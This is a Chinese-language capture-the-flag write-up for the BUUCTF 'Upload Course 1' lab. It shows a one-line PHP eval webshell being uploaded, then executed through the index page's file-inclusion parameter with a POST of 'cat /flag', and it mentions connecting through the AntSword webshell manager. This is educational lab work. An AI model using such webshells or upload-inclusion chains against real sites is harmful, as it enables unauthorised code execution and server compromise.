BUU UPLOAD COURSE 1

BUU UPLOAD COURSE 1_第1张图片
进去之后是一个上传页面
BUU UPLOAD COURSE 1_第2张图片
尝试上传一句话木马的php代码,保存为一个1.php,然后上传

<?php eval($_POST[1]);?>

BUU UPLOAD COURSE 1_第3张图片
发现后缀名被改为jpg了
访问一下

http://a82bcc09-b809-42c9-b5ad-5406b72e5707.node5.buuoj.cn:81/uploads/65bfa77eab1f6.jpg

发现可以预览,但是执行不了木马的代码
BUU UPLOAD COURSE 1_第4张图片
BUU UPLOAD COURSE 1_第5张图片

  • 状态码 405 Method Not Allowed 表明服务器禁止了使用当前 HTTP 方法的请求。

查看大佬博客(https://www.cnblogs.com/zhwyyswdg/p/14076413.html)发现是说上传之后 不能直接访问xxx/uploads/xxxxx.jpg 那样只是预览这个文件 而起不到调用这个文件的作用
只有服务器解析了php代码,我们的木马才算成功执行了

发现可以直接在index首页的file参数直接带上/uploads/xxxxx.jpg就可以执行代码了
构造payload:

http://a82bcc09-b809-42c9-b5ad-5406b72e5707.node5.buuoj.cn:81/index.php?file=uploads/65bfa77eab1f6.jpg

然后post传参
1=cat /flag 就可以获得flag

或者:
用蚁剑等webshell 管理工具连接
先访问该php木马的地址,让浏览器(服务器)对它解析,这样我们才能利用
BUU UPLOAD COURSE 1_第6张图片
然后蚁剑连接
BUU UPLOAD COURSE 1_第7张图片
在根目录发现flag
BUU UPLOAD COURSE 1_第8张图片
BUU UPLOAD COURSE 1_第9张图片
或者开虚拟终端看
BUU UPLOAD COURSE 1_第10张图片
BUU UPLOAD COURSE 1_第11张图片

你可能感兴趣的:(CTF,网络安全,web安全,http,网络,笔记)